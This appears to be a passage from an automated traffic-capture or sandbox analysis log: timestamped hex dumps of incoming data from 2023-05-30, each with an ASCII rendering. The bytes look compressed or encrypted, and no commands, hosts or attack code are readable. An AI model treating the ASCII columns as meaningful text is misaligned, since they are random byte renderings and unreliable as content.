                                                                                                                    2023-05-30 09:06:51 UTC62INData Raw: 97 f9 05 4a 6d cf 48 27 ad 5b 0b 95 4f 6d 75 2c d2 f3 09 d5 ab 92 30 43 6f 49 23 99 d3 d8 7d 9f b4 4c be 63 60 7f 3d 0e fe 8d 0d db f7 08 3e b9 e6 86 78 2f 13 fa 6a f9 e4 5a d5 37 4c 09 57 3a e7 1e ed 19 05 39 19 7c 41 e6 5d f2 18 51 fb 5e ac 71 a3 2b d5 72 78 bd 2d 4c 99 a3 5d 07 66 22 42 d0 69 0f d6 30 94 5d 75 f2 5c 49 e8 57 4c e1 2a 7b ae f7 e0 8a 2c e4 d1 46 5f 09 80 66 4f 98 4c 84 3b 76 91 77 bd 13 86 85 37 0a a7 92 38 be 5e 91 40 a4 2d 79 20 f3 4b e8 b7 e9 80 09 e6 c6 2e eb f0 d1 6a 7c fe f7 92 ec 70 76 60 96 64 1b a4 97 7d 7e ff f3 4d bc ef a6 a1 c3 d2 3e ff 21 97 4b d3 7c 8f a6 0c 8e 0c 10 b0 7e 56 14 5c 55 e0 3c 13 4d 04 ec a9 cf 6d c6 6d 8d 4e 9c 20 27 8e ec 34 07 49 5b 1f e7 50 53 82 01 cb 63 42 0a ee c3 f0 38 9e 97 91 62 85 14 59 d7 6e 62 00
                                                                                                                    Data Ascii: JmH'[Omu,0CoI#}Lc`=>x/jZ7LW:9|A]Q^q+rx-L]f"Bi0]u\IWL*{,F_fOL;vw78^@-y K.j|pv`d}~M>!K|~V\U<MmmN '4I[PScB8bYnb
                                                                                                                    2023-05-30 09:06:51 UTC63INData Raw: ae 03 56 8f 25 6b 57 fc 50 5b 3e 77 13 20 f6 40 d9 ea ef 5f 34 5d ba 45 7b 2a 4d 13 2b b8 53 fa c6 52 c8 49 bd 4c 67 11 9f 3b 1b 93 44 94 cc e5 1b 55 71 5a ce 84 89 23 0d 6f f1 07 44 fe 40 47 45 a8 f6 ff 54 a0 61 e2 cb 2e 60 1e 78 cb aa 0b c6 d3 fa 54 15 7c bb 96 10 97 57 db de 07 68 5a ad 5d ec c5 ac 7c 4e 55 68 23 ec d2 f9 e9 64 2c 5a ab 5d 21 44 b2 bf 69 04 e5 7d f7 a7 0c 9b 76 df 67 4e 52 bb 9e 06 02 86 fa 88 b6 1a 79 f2 0e 22 39 84 11 95 2e 05 a6 6a 59 25 2a 14 0d a9 79 02 d4 7a 9b 9c 2b 04 9c d8 a9 ea ac 3f de bb e6 7e 68 a1 3f b4 92 2b 88 06 a5 68 54 c6 75 81 5e d5 7e 1e 21 8f 92 05 6f 1a a5 38 b6 d2 5c 9f da d9 24 dc 02 27 69 10 79 38 69 97 f0 bc 33 58 74 55 55 34 20 b7 b2 fb 9c 01 de 0e a5 35 40 0c a8 cc 2e 94 aa 2e 07 da 3a 5d 76 48 4a ee 58 48
                                                                                                                    Data Ascii: V%kWP[>w @_4]E{*M+SRILg;DUqZ#oD@GETa.`xT|WhZ]|NUh#d,Z]!Di}vgNRy"9.jY%*yz+?~h?+hTu^~!o8\$'iy8i3XtUU4 5@..:]vHJXH
                                                                                                                    2023-05-30 09:06:51 UTC64INData Raw: 84 65 a2 0e e5 4d 35 47 c1 6f 6f 92 bb 1a dd d8 3f 3a c5 bd 5a 48 f4 2e 08 cb ca a7 67 9c ff 46 41 82 f0 5b 8b a7 f5 7d 5e 16 3c 14 6c 00 dd fd c6 52 67 ff 3e 7a fc d8 34 5e 4c 64 6a 37 57 ca 73 b2 f6 fb 34 64 d1 ac cf 64 5a 6e cd a7 29 cb f9 b9 38 ed 72 e1 e3 84 17 a1 f7 c8 0d 22 40 65 a2 ed f4 3b 20 8c 20 57 37 ef 27 93 da e3 ed e7 c6 2d 53 73 bd 55 57 32 a4 2d 6d 97 2a b8 a3 5a 8e a4 d1 a1 f5 d8 e5 b7 79 7c 3c 0a 1c 8c 03 d5 85 1a 95 91 b5 17 49 d1 a8 62 18 ed fc 19 a8 db 1c be 71 a2 5f 7e 8b 40 23 a8 b8 17 22 65 e7 17 9f fb c9 e4 b3 3c 54 69 f3 40 7d 94 a0 7f 54 ce a5 28 88 5a c0 d3 9c 01 cd 06 78 69 46 8b a7 fb 3b 80 78 7d 18 95 97 b0 f0 e8 24 e9 58 68 af 52 5e 4b 68 27 8f 85 b4 e3 be 40 39 1b d8 6a dd 2c 33 b4 33 60 39 e6 e5 b8 4c 93 de 29 ae 90 65
                                                                                                                    Data Ascii: eM5Goo?:ZH.gFA[}^<lRg>z4^Ldj7Ws4ddZn)8r"@e; W7'-SsUW2-m*Zy|<Ibq_~@#"e<Ti@}T(ZxiF;x}$XhR^Kh'@9j,33`9L)e
                                                                                                                    2023-05-30 09:06:51 UTC66INData Raw: 97 6f 19 6c 29 5b b4 c9 c0 c2 a2 46 b1 2d 17 03 37 6d bd 9d 46 a6 ca 04 5e 0a 68 2b 45 86 1f 71 64 0f c5 89 71 7a 26 4b b4 77 ed 08 c8 d5 f5 52 45 59 12 6e aa e3 68 04 df 85 2d 80 49 a2 9c 25 89 89 e5 3d eb 8b ee 62 2e 95 b9 46 02 8e 5b 8b 36 a4 94 be 0c 0e 73 af 62 b0 97 66 50 b6 13 bd
                                                                                                                    Data Ascii: ol)[F-7mF^h+Eqdqz&KwREYnh-I%=b.F[6sbfP
                                                                                                                    2023-05-30 09:06:51 UTC66INData Raw: c1 ba cb db b3 38 da 66 52 91 62 6d 82 78 34 c4 54 e8 93 ec f5 d9 1a 42 0e 48 30 1b e5 85 6a 1b 70 60 9a a1 49 42 8b 19 5b b4 6c fb 40 cc 2a bc 29 51 8a e2 96 fd 9e 8c 8c c7 9f c2 01 a9 cc 7b d3 8b 58 1e 3a ef d1 1d 06 38 d5 03 96 db da 6b c9 27 39 9a 17 45 d2 a8 7c ea f1 a8 f3 6e b6 02 94 50 c7 dc b6 bc fd 5a 2e 45 bc 84 6a 59 5d d4 d2 ce 23 ac 0a 06 6f 0a f4 2b 00 b5 03 96 83 ac b0 11 37 1b b6 0f f8 c0 46 29 57 73 e2 b4 b7 6a 83 8e 15 3d 9b 97 c7 db 61 85 35 34 fa 33 77 54 87 21 12 9b 2c 56 db 5d 63 96 30 f2 ab e7 d2 52 79 3f 99 4f 86 37 00 81 a5 99 05 00 d2 de ce 11 d4 60 2e 7a 53 49 dc 58 4d 26 45 2d 9a f4 b0 64 a0 22 6c 0d 08 cd fa 50 b0 7b 3a 58 9d 02 39 87 e0 dc ab 36 e4 ed b7 7e 45 ee b0 98 2e 34 f4 7c c9 7c ff 41 66 b9 a7 f7 c8 70 0f 68 dd 40 2b
                                                                                                                    Data Ascii: 8fRbmx4TBH0jp`IB[l@*)Q{X:8k'9E|nPZ.EjY]#o+7F)Wsj=a543wT!,V]c0Ry?O7`.zSIXM&E-d"lP{:X96~E.4||Afph@+
                                                                                                                    2023-05-30 09:06:51 UTC67INData Raw: f2 3e d9 bc 64 2b 95 38 dd a4 27 27 ae 6f 06 bf 82 74 84 20 e2 79 72 26 58 9a 9d d2 cd fe 8b b4 d8 65 1a 90 4e c7 96 61 f7 bd 21 fc b5 6c 00 00 24 b5 ab 0e 33 7a fa 35 52 a1 d1 d7 f0 e6 81 99 9a b5 01 d2 36 f0 49 28 fd f3 db f7 47 75 ab c6 a5 f4 c8 45 f6 06 66 30 ba 65 db 8a fe b9 c8 da 0f 33 a0 65 19 a1 d5 2d 84 c4 da 14 47 25 d0 ba ed e9 ac fd c8 fb 2c 06 45 48 2a b8 6b ec 92 b1 39 6e 90 79 88 7f ed fd 6d 91 f8 dc 58 81 f7 70 1f f8 14 d9 33 6f 56 3b bf 4e 94 34 30 a3 4c 58 5c c2 b7 d7 2a 33 10 9e 28 14 70 1d 12 86 7e 38 d3 ec d5 80 b4 14 db ad f6 66 ff a3 d2 16 23 0c 38 95 12 e6 2d ed 80 1f 28 0c c0 af fc 92 0c 1e b4 b0 0b cc f3 cc bd 8f 8f 5c 31 0b 61 f4 4a 36 fd 7b e8 29 61 a1 03 57 5a 81 2b 47 67 cf 3d ef 6b b1 fb ab 7e 8e 46 c6 12 a6 d8 d8 96 04 df
                                                                                                                    Data Ascii: >d+8''ot yr&XeNa!l$3z5R6I(GuEf0e3e-G%,EH*k9nymXp3oV;N40LX\*3(p~8f#8-(\1aJ6{)aWZ+Gg=k~F
                                                                                                                    2023-05-30 09:06:51 UTC68INData Raw: b5 a7 d7 ca 21 68 22 bb b7 f0 a4 63 7d 9a af 95 cc 3a 34 ce e2 ba d1 9b 0d 6a 0c 2c 14 c4 77 14 41 62 12 a6 5c 05 15 12 6b 12 67 d8 ab f5 1b bb a2 28 a8 f4 59 31 7c 26 c5 cb af d1 f7 03 fb e1 55 fc ac 09 75 26 59 f2 8b 30 b8 f3 d5 4d 4c e8 9b ad f8 42 13 15 90 55 46 44 5f 06 4f 38 f8 e1 ca ce 70 29 82 9c 7d c2 71 5b 77 fe 86 5f 1a ca 91 9c 3a 95 a2 89 53 5f e3 1e 56 7e 83 11 30 d0 76 0f 13 bc c8 e0 ed b6 2a 6d be c2 63 84 01 14 61 1f 35 e9 2a f5 48 85 b0 47 36 1e 46 de 80 ff 58 e6 85 44 72 95 16 f7 10 20 14 2d 10 f3 92 1d 84 87 32 5c a6 58 0a b7 20 71 a1 33 3b 9f 6e eb 36 0d b8 af 0e 2b 57 50 57 bf 6f 77 23 4d a7 42 21 3b ed bb 9b ef 85 40 be 86 03 f3 bf 98 b5 3c 93 db 8d d9 6c 3b eb 27 40 3f 69 79 d9 89 98 b1 8e fd 8b 62 b3 5b 0a b5 2c bf c1 c5 ba f1 72
                                                                                                                    Data Ascii: !h"c}:4j,wAb\kg(Y1|&Uu&Y0MLBUFD_O8p)}q[w_:S_V~0v*mca5*HG6FXDr -2\X q3;n6+WPWow#MB!;@<l;'@?iyb[,r
                                                                                                                    2023-05-30 09:06:51 UTC69INData Raw: a2 e9 6a ba 4c 4b 93 17 03 4a 99 4f 9f f9 db 09 62 a9 3d 81 b4 98 aa ef a8 4e 97 17 be 67 13 54 40 23 70 db b9 f2 0c a9 c0 28 d6 35 d5 3f 34 d8 b9 86 0e 9f 27 b1 4d 6c 3f 7b 41 eb f5 db 59 09 bd 55 a6 81 1b 4a 8d 11 3c c4 13 1c 6b b1 46 fb bb ee 13 51 f7 50 63 98 e1 63 45 62 28 ae 72 9e 15 eb 79 b0 22 fb 4c f2 1c 8a 1b 29 ca 0a b9 0b 44 40 58 21 ee be 0b cc 66 27 9b d6 3c fd 8a 16 29 42 5b d0 26 99 ea 81 0f ef 8f a2 54 7e a9 87 9b 12 c5 ba b9 a0 c2 39 2b 9a e5 91 45 1f 03 7e 64 cf f0 12 e0 bb e7 8d 95 74 8f 0f 77 f0 96 54 ae 76 6b 4f 5a 24 d3 74 85 a8 46 47 75 9e e7 af 06 0c cf 63 e4 d5 7f 84 34 dd 53 95 e9 52 f2 d1 9a 15 1b d5 a5 75 fa 7d 91 16 47 e4 9c da 4a 32 8c ea cc 9c a3 62 da 5d 7f 0e 13 b7 d3 f8 cf 26 d3 a9 d7 58 f3 10 3e 49 47 a5 77 90 ba 5a e5
                                                                                                                    Data Ascii: jLKJOb=NgT@#p(5?4'Ml?{AYUJ<kFQPccEb(ry"L)D@X!f'<)B[&T~9+E~dtwTvkOZ$tFGuc4SRu}GJ2b]&X>IGwZ
                                                                                                                    2023-05-30 09:06:51 UTC70INData Raw: b9 33 76 78 62 e6 d2 d4 5e cc 11 17 cf 2e bf 05 55 59 06 d4 61 5e 7c 17 aa 80 58 ed c4 1c 75 96 c4 71 8c d4 04 3d 47 3d e2 f2 ab e5 85 cc 1f d8 31 54 e8 a8 45 01 e9 c6 24 b6 28 60 2e be e1 0c 92 42 da f8 44 e3 a5 6f 21 bc 82 06 77 76 fa 10 84 82 19 bb 7a 08 0a cb 2c 2d a1 05 10 2c d7 7f a7 d6 68 d7 c7 75 01 a3 04 46 6c 7e 42 39 9b 95 f1 4a c7 77 d7 fb d0 ff 0b 0f 11 7f d9 59 7e 5e 65 31 46 c5 66 a6 de 22 4b 42 63 a4 e8 73 f5 33 9c a0 6c 96 4c 8b b3 e0 a5 b4 cf b0 80 08 b2 d6 0b a2 ba 03 ce 00 ed d1 1c c9 29 4e ca 95 61 01 4d ee 6b 47 19 af c8 62 bd c7 b1 e2 b3 8b a9 1f 4a 68 05 9f 11 20 3d 06 25 78 61 eb a5 d3 26 d7 bd 09 7d f7 e3 88 ba ca a8 81 d1 d0 30 0e 81 ce 8d 66 97 4a d0 b6 f3 27 0e e4 52 dc 03 c1 10 05 48 a5 52 72 9b 86 77 86 94 28 cd 6b d7 73 18
                                                                                                                    Data Ascii: 3vxb^.UYa^|Xuq=G=1TE$(`.BDo!wvz,-,huFl~B9JwY~^e1Ff"KBcs3lL)NaMkGbJh =%xa&}0fJ'RHRrw(ks
                                                                                                                    2023-05-30 09:06:51 UTC72INData Raw: bf d7 05 85 73 e0 d3 cb 34 f8 2f 47 f4 e2 f8 07 28 dd 73 94 19 eb 0d c1 32 b1 0d a3 b6 58 35 78 e6 5f d4 9f bf 50 93 4c 65 3f 00 4b e6 dd eb 00 bc 0c 2a f9 22 12 e7 3d 9a 66 ff 87 79 0a 7c 18 07 6e 2b 5c 6e f9 73 5a 14 a2 b5 27 52 d9 fe 26 1b f5 b3 72 1f 2e 6a 90 de 09 70 f0 26 6c d5 47 6a b2 4f d7 82 56 3e 37 a6 12 2b 60 f6 f4 f9 9e a8 5b 7c d3 f7 db 1d 9e 75 9d 61 37 f2 6e d1 d9 66 ed e4 4a 71 28 41 1b 6e 2e dc 1d cd 89 13 1e 50 db 98 8b 06 25 8b 28 6f f1 1b eb 48 0a e1 4c 08 68 ad 39 73 59 2c 13 28 8c 5a 4a 1e 99 65 b2 b0 98 37 34 a6 5e 44 c1 c4 19 52 a6 2a be ea 79 14 9e d2 07 01 69 e6 4e 88 5b 00 a3 cd 82 30 3e bf 42 b9 81 df ae 9f a9 f6 39 bf 7b 61 da 83 70 6a fc 9a a6 f2 54 bf 3f 58 59 de ec ea 54 f1 59 7b 27 6c c0 3a c6 6b 33 a6 00 69 11 2b ad 44
                                                                                                                    Data Ascii: s4/G(s2X5x_PLe?K*"=fy|n+\nsZ'R&r.jp&lGjOV>7+`[|ua7nfJq(An.P%(oHLh9sY,(ZJe74^DR*yiN[0>B9{apjT?XYTY{'l:k3i+D
                                                                                                                    2023-05-30 09:06:51 UTC73INData Raw: 3e 0a 4e 29 5a 5a 57 95 a8 06 b9 bb f4 d2 c2 7e ae 8f 2a ce 38 56 be cd 03 21 42 7a 40 e6 ed f6 66 a1 de 7e d2 f6 5f 82 17 89 af 49 fd e8 2f 28 4b bf 99 f9 78 ca 30 07 73 29 3f 89 df c4 c4 56 ac 5d 2f 15 d7 c3 2a 3c 6f 96 58 af 61 a9 3d c7 57 09 8f 0b c9 05 fa 9c b9 ed 31 75 a0 9d 60 43 fb 3f 73 cd 57 a3 55 e3 93 74 0a d0 16 3f 4d 0d c0 74 c9 1d d4 4f 28 7c 86 88 d4 4a c9 38 3d f2 4c 67 9f 88 74 3c fd d0 5e 05 5b 9a 71 18 1c 28 18 70 20 c1 fd 76 10 64 30 f4 05 6f 96 ec d0 b7 3e f0 04 3a 30 25 4d f7 57 4e 92 1e 80 f1 24 96 b6 fd 5c 14 ea 6b 7a d4 f2 ee 6e 94 dd 2c 5c 35 6f ac 00 70 f8 23 18 74 86 40 0d 7e 50 ed e5 0f 8c 3a 7a 69 f9 46 37 c2 1d 46 a5 12 bb 67 b9 03 dc 7e 72 d3 0e 79 ea bb d5 53 c7 f3 fc 7c 14 e0 51 c1 23 d5 90 1a 5c 60 6f 99 29 f6 5a 3a 9f
                                                                                                                    Data Ascii: >N)ZZW~*8V!Bz@f~_I/(Kx0s)?V]/*<oXa=W1u`C?sWUt?MtO(|J8=Lgt<^[q(p vd0o>:0%MWN$\kzn,\5op#t@~P:ziF7Fg~ryS|Q#\`o)Z:
                                                                                                                    2023-05-30 09:06:51 UTC74INData Raw: 80 1d bd 5f 13 94 27 33 4a 58 ff cf 58 25 e9 0f 06 bf 29 6a 87 00 1e aa 3c 59 e3 a8 12 99 12 ab 43 45 9f 1b f8 48 b4 4b ae dc 03 e6 6e dd d5 98 3e 71 47 f6 3c 54 d2 af 58 04 68 48 a5 95 ff c2 6c ce 13 fe 01 45 2f b9 a4 84 54 00 ad 69 bb d1 9d 3f dc 2f e7 85 f9 66 03 4c 32 ad 29 b3 64 65 68 88 51 cf c1 9a 4d e5 0a fe 68 09 02 5c d8 09 c9 b5 67 58 6c b1 80 0e bf 1e 9d 44 48 c8 85 07 d4 45 0c ef 23 f9 0c f5 75 b1 8a d3 9f 0c dd 55 6f dd f0 8a 31 c6 1f 47 c4 23 03 ac 58 f0 95 71 b6 27 bb 69 5e 6b e4 d7 ee 9c d6 b9 91 f1 50 a8 c6 2d 72 1a a2 ca 0c 40 5d 58 f8 cc e7 d6 67 0b 7b 51 a9 8c 2c 51 52 fa 03 20 0f 03 aa 20 0e 0e b3 0b 35 6f 26 8c 7a 97 04 f7 ad 43 8b b9 a4 7b 2d ba ea b0 50 76 77 51 f2 78 86 8a 1a c0 f1 f2 99 ce c1 50 24 2c 2b 5c 29 91 e6 13 d2 c3 76
                                                                                                                    Data Ascii: _'3JXX%)j<YCEHKn>qG<TXhHlE/Ti?/fL2)dehQMh\gXlDHE#uUo1G#Xq'i^kP-r@]Xg{Q,QR 5o&zC{-PvwQxP$,+\)v
                                                                                                                    2023-05-30 09:06:51 UTC75INData Raw: 61 f9 76 bd 72 ad 4b 5d 03 ed a2 54 43 22 f6 1c c5 a2 f8 e5 99 bc 43 3e 57 d3 4b 87 f6 6e 50 ab 39 72 04 1d 6f 4d a1 7c f3 1e 2a c1 12 28 32 e8 7e 06 f9 08 1e de e6 ba 90 90 95 4e fc 76 a3 10 ec 44 0b 49 84 b7 a1 0f 3d 70 b4 d3 9d 8b 80 fc 1a 6d 16 ea 2d 9d 05 18 59 4a 21 5c a7 66 1d ff 21 e6 78 ec 5f 75 09 cb 60 90 d0 6d 38 f9 ed 47 17 62 c8 db 2e 82 45 e0 46 81 2c 01 29 d9 b6 2c 1c 6c 70 bc 4e 59 98 31 1a d9 98 02 17 86 3a da d6 38 ea 34 03 f0 f7 da cc b2 c0 55 21 85 67 1a 53 cf dd e8 08 f3 b1 48 28 96 c2 a5 5a 6c 22 c6 f5 13 b2 88 e9 f3 d7 b6 be 0e d2 9c 0c e3 d5 6d 2d 0f 71 69 06 5d 6a 1d 4b 61 d8 97 2c 50 e3 b7 51 cc 3e 7f 60 cf 83 bf e4 bb b8 37 f4 84 1f e2 44 86 3e 63 6d 48 04 e0 17 84 63 15 b5 59 38 34 1d 1c 7a 8e 81 da 09 3a 29 44 56 f8 c7 bd 12
                                                                                                                    Data Ascii: avrK]TC"C>WKnP9roM|*(2~NvDI=pm-YJ!\f!x_u`m8Gb.EF,),lpNY1:84U!gSH(Zl"m-qi]jKa,PQ>`7D>cmHcY84z:)DV
                                                                                                                    2023-05-30 09:06:51 UTC77INData Raw: 37 2c 1c 51 58 08 75 8a f5 a7 8d 40 29 55 c2 1d ae ec 83 86 c8 7e a2 d5 74 cf 25 b4 0f 76 04 a0 53 e7 67 37 c5 e9 ef 19 d2 01 08 3b c0 0c 3f 22 7e d2 29 c1 a2 b7 5a e5 8f c0 47 a6 60 d2 79 0c 4c 14 fd 37 d8 31 10 1e f7 37 b2 32 04 a8 fe fd 22 1e 4f 75 5f 31 40 05 14 06 17 ba 5f a6 8a 33 8e 84 b1 27 87 31 b5 c0 74 56 fa 24 e9 02 55 d1 04 74 ca 39 42 60 1d 11 83 eb 3b 10 eb dc a6 bf 52 85 88 61 6f 5c b1 a5 3d e0 6a 0c 0a 0e 84 11 97 82 96 e7 c1 d7 a2 3f 05 20 6d f9 01 d3 4f 41 de bb c7 05 2b 1a fa 31 ec ba ed 4c ab 7b 36 b6 e1 ca 29 9e 7e d1 ab 82 f0 0c e4 06 1c 71 74 71 1e c9 8c 31 2e c9 c9 26 fd 8c 99 34 c9 ce e3 fe 02 1f c3 2d d5 2e 96 56 82 b8 8a c9 07 41 a9 6a ed 85 91 d0 1a 90 c8 4d 34 81 df f6 2a 26 6c 70 d5 f8 44 62 0e b0 eb 7c b1 c9 33 08 75 93 2f
                                                                                                                    Data Ascii: 7,QXu@)U~t%vSg7;?"~)ZG`yL7172"Ou_1@_3'1tV$Ut9B`;Rao\=j? mOA+1L{6)~qtq1.&4-.VAjM4*&lpDb|3u/
                                                                                                                    2023-05-30 09:06:51 UTC78INData Raw: 2d 55 bb 2b 48 21 97 09 a1 ac 8b e9 bb 11 c0 66 16 9d 67 63 ed 08 80 67 b8 9b ac 62 1f 59 56 28 69 7b a6 79 c7 ff da 4b 87 74 76 a0 ae 09 5b d7 76 64 6b d2 88 e3 dd 80 e5 f7 da f8 d0 d4 c7 3b 31 df d8 b1 95 2f 6f e6 b4 4b df 60 d5 29 c4 c9 bb c8 b7 cc 17 cf 6e 16 4f 04 bd f6 e8 bf 91 e6 71 c6 99 aa 03 35 a6 95 a4 79 51 2d 11 1e e9 16 07 7c 59 99 10 eb 52 cc ea 22 77 e3 0e 1e f6 1c e0 b8 e0 90 75 8e f6 1e 6a 08 28 32 e4 1d 82 c2 24 11 21 13 24 1a 8e 9e 76 9d c1 d0 31 7e 4f 6a 4e 9b 1c 67 9b 6e 1d d4 b0 ea a2 40 e3 bf 1e 67 46 fa 7d 09 ca f2 97 ed 70 2b 40 73 83 fd 1d 6a ae 3c 85 28 43 14 ba 3d e1 3a 2c 73 33 80 66 e5 c9 41 f5 3c b5 d2 20 6d 6d 7b 12 06 5e ab 07 2a c1 7d 2f c6 84 cb 63 05 34 71 b8 68 9b 50 60 aa a6 4d f2 57 ee f9 c0 ed b9 9c fb 3a 13 a2 78
                                                                                                                    Data Ascii: -U+H!fgcgbYV(i{yKtv[vdk;1/oK`)nOq5yQ-|YR"wuj(2$!$v1~OjNgn@gF}p+@sj<(C=:,s3fA< mm{^*}/c4qhP`MW:x
                                                                                                                    2023-05-30 09:06:51 UTC79INData Raw: 45 5f e1 f8 9b 63 f0 9e aa 5d aa 40 64 4c 9c 1a eb 59 cb 2f f3 73 b4 48 5b 48 29 66 e4 c4 8e 2d ec e0 2a 5b cb 6e ad ca d6 19 2d 26 a1 f7 ae 88 ec 0c f9 9f 04 83 a5 a7 0c e5 ea 7e 56 37 bb ae c2 ad 2a 3e 7d ad 84 87 45 5d 04 63 79 f1 42 4b 4a 20 48 c4 cd ad 94 f0 96 18 de b4 ec ee 8f 64 30 12 98 0d e3 7c 53 9c d1 a4 f0 19 d5 b8 17 8e c9 e9 eb a3 99 a1 3a 88 58 41 6b 06 94 33 87 40 78 29 08 4e 34 57 0d e6 1e 7a 1e 0b 89 24 76 a4 13 5f 95 b5 c6 b7 df b1 d5 e5 c7 26 31 45 52 5d db ee 47 18 c2 17 4b 61 40 ab d6 74 ee 88 30 de d2 13 cf 0f e6 92 ca 26 f0 69 34 36 e4 18 a7 4c 11 73 76 af c8 4d 9d 95 cf 5e 09 cd 94 33 86 c5 00 9c 97 6f 3f f4 5d 60 20 57 6d 14 79 24 e2 d0 f2 49 80 ab 93 38 f6 5f a6 c4 75 8a 52 e2 45 f2 9b 03 f7 50 94 19 6f ae 18 23 94 e9 37 83 c7
                                                                                                                    Data Ascii: E_c]@dLY/sH[H)f-*[n-&~V7*>}E]cyBKJ Hd0|S:XAk3@x)N4Wz$v_&1ER]GKa@t0&i46LsvM^3o?]` Wmy$I8_uREPo#7
                                                                                                                    2023-05-30 09:06:51 UTC80INData Raw: 53 c4 0a 2d 62 9a 2a 39 3b a2 c6 6b 75 d5 e2 07 c1 6a 37 1a 1e 47 e1 92 1e b4 d7 e5 85 8f f5 30 41 24 36 ed ed 38 37 6e 94 3c af 60 e7 a7 fa 13 96 b6 62 5f b0 7c aa 47 c3 12 9f d7 90 47 1f d6 dd 9a 16 d2 3d 29 e3 2a 64 3f 2b 1d 4e 73 16 d1 f9 29 57 8d dc cb 98 73 30 f6 e0 0c 3f 61 ed d7 60 da af df 11 68 4e 48 97 de 55 c2 38 5d 4f ae e2 52 42 a4 cc ee 77 91 1e 47 8b 83 18 d3 0c 3f 2d 84 73 d5 59 c3 ee 88 df b9 44 aa 17 01 76 66 04 4c d0 46 8d 30 77 e5 64 98 a0 49 85 42 bc 9b b4 ad b8 76 eb 4b e6 72 fa 32 1b a4 cc f1 ad 30 d4 31 93 97 ba 0c 4e aa a9 c5 79 3e 15 69 53 96 a9 76 45 e9 b1 80 fd 08 84 a3 f7 33 d5 7c e1 fe dd 34 0f d1 25 2a f7 c7 83 28 59 c7 85 b6 8b 48 be e3 8a 07 31 a4 31 5d 60 4c f0 32 d6 6f 13 63 c3 ae e0 85 84 52 45 a6 f9 4b fc af 20 11 2a
                                                                                                                    Data Ascii: S-b*9;kuj7G0A$687n<`b_|GG=)*d?+Ns)Ws0?a`hNHU8]ORBwG?-sYDvfLF0wdIBvKr201Ny>iSvE3|4%*(YH11]`L2ocREK *
                                                                                                                    2023-05-30 09:06:51 UTC81INData Raw: 3a 97 d4 07 25 eb 84 69 85 ba 13 ad 7c 9b a5 aa 8e 1a 75 a5 69 61 78 4d 7e 74 3e 17 d1 b3 18 a4 7b 79 68 c4 e4 dd 1a 05 f9 dd dd a9 cd 24 f1 56 c8 be a2 6f b1 bf 62 b9 f3 1c 78 df 5b f5 73 b8 71 47 cb 5e bb 99 fa ef b4 5c ab 55 ca f3 d6 2a ea d2 00 a8 8d 54 40 97 2a 49 77 d1 80 c3 8f 90 23 3c 97 03 09 08 3b 05 7b 24 11 e0
                                                                                                                    Data Ascii: :%i|uiaxM~t>{yh$Vobx[sqG^\U*T@*Iw#<;{$
                                                                                                                    2023-05-30 09:06:51 UTC82INData Raw: 8c 57 46 84 ec 5b 4f 38 c1 1d 52 00 4e a6 c5 46 68 be b8 49 16 d9 49 e6 e4 36 4f 48 17 37 22 86 7b cd da 28 f0 c7 5a 8d 8e 55 c1 eb 67 64 42 eb 1c f7 87 07 2e 76 e9 e8 db 41 c0 ad 93 c3 d2 56 19 de 5d db b1 d1 9c d8 70 b9 2f 38 4a 94 48 35 6d ee 8d 61 f1 9f fa b6 37 6d 23 82 6f 4a e1 ec e5 08 75 b7 da b2 2c f3 c5 9e 5b ca 2a a1 45 8e cf bb 7c 96 68 82 7b b8 5f 7e bf 18 c8 e8 0e 4f 13 ab 80 cf 93 9c 53 5e cc 11 f8 a2 6c 14 ee 00 98 81 2a 26 bd 5f 81 bc 10 68 08 3f aa d4 ce 83 f3 d6 fd a5 7e 60 03 8b 82 99 f7 3d 98 46 70 01 9b 1e 8d 46 08 37 1c b2 90 8f 60 08 66 9f 79 ff 8c b4 01 0e 65 86 08 f5 42 6b 52 b4 63 b7 a1 14 99 66 c0 4b 6b c5 99 02 1f 31 49 2d b9 7b 27 56 94 66 2c a1 70 9f f2 4b ab 2f d0 a9 b4 c1 67 0a 13 dc ac d9 20 11 91 fe 24 40 00 8d c1 76 0d
                                                                                                                    Data Ascii: WF[O8RNFhII6OH7"{(ZUgdB.vAV]p/8JH5ma7m#oJu,[*E|h{_~OS^l*&_h?~`=FpF7`fyeBkRcfKk1I-{'Vf,pK/g $@v
                                                                                                                    2023-05-30 09:06:51 UTC83INData Raw: d0 02 e7 02 53 de eb 91 d7 d0 ee c0 69 70 f8 35 ff f8 f1 8f 62 dc b4 5b fe e7 43 fd 81 1a a5 12 75 ea 4e 73 b4 e8 82 22 5a 3a 67 cc 49 bf 61 89 c7 60 37 d4 e4 24 7f 59 25 f4 66 09 f1 b1 ee 01 47 16 b1 03 a9 b7 9d 8d f7 42 a2 d7 84 de 47 21 b7 e6 60 31 6b e8 83 a0 2c 99 a4 a5 47 b9 01 c6 d4 88 84 49 46 43 b5 a8 ef ec ac 98 98 66 e4 20 cd 0d 12 ac 0e c2 47 b3 4e 34 88 35 cb d7 a5 3e 2c 71 ef 5e 98 48 87 82 49 eb 7c b5 f7 2a 0f 32 f4 6c d2 80 c2 a5 46 45 c4 15 bd ae 3d 5c 66 4d 73 95 62 1d dd b3 04 f2 f9 4d 46 07 ad 6a e4 84 65 19 74 22 c1 ea c8 d9 ab 13 48 a4 b8 02 08 87 58 3d 5c 73 a1 ed 97 45 f9 5c 7e 1d 0f cf 26 10 0e 5b 8e dc 17 19 d7 4f 1b c2 54 f3 6d 1d 5c 55 7f a7 8b 5b 74 39 14 5b df ea 4b 2e c8 b1 47 9b b8 73 81 56 8a 84 cc 4a 67 86 2d a9 69 65 ac
                                                                                                                    Data Ascii: Sip5b[CuNs"Z:gIa`7$Y%fGBG!`1k,GIFCf GN45>,q^HI|*2lFE=\fMsbMFjet"HX=\sE\~&[OTm\U[t9[K.GsVJg-ie
